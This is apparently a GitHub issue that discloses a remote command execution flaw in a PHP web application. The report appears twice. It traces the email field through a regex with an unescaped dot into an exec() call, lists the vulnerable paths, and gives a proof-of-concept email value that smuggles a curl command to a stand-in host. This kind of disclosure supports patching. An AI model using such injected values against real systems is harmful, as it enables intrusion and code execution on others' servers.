The $email is from Request::parse().
Lines 44-56 of the "Request.php" show us that we can input any data.
Lines 294-295 of the "user.php" use a vulnerable regular expression because there is no backslash in front of the dot,the dot can match anything.
Then,the email income the EmailSender::send()
Let us check the function.
We can exploit function "exec" to Remote Code Execute.
Vulnerability exploitation process:
Register and login.
Input the POC.
We can check 'result.txt' and decode it.
POC code:
youyou@qq.com'xx|curl test.server.com;xx'xx
Your exp should be in test.server.com.We can execute any remote command.
The text was updated successfully, but these errors were encountered:
List of Vulnerable path
Vulnerable path /application/controllers/api/user.php
Vulnerable path /application/libraries/service/Network/Request.php
The process of code audit
The $email is from Request::parse().






Lines 44-56 of the "Request.php" show us that we can input any data.
Lines 294-295 of the "user.php" use a vulnerable regular expression because there is no backslash in front of the dot,the dot can match anything.
Then,the email income the EmailSender::send()
Let us check the function.
We can exploit function "exec" to Remote Code Execute.
Vulnerability exploitation process:
Register and login.





Input the POC.
We can check 'result.txt' and decode it.
POC code:
youyou@qq.com'xx|curl test.server.com;xx'xxYour exp should be in test.server.com.We can execute any remote command.
The text was updated successfully, but these errors were encountered: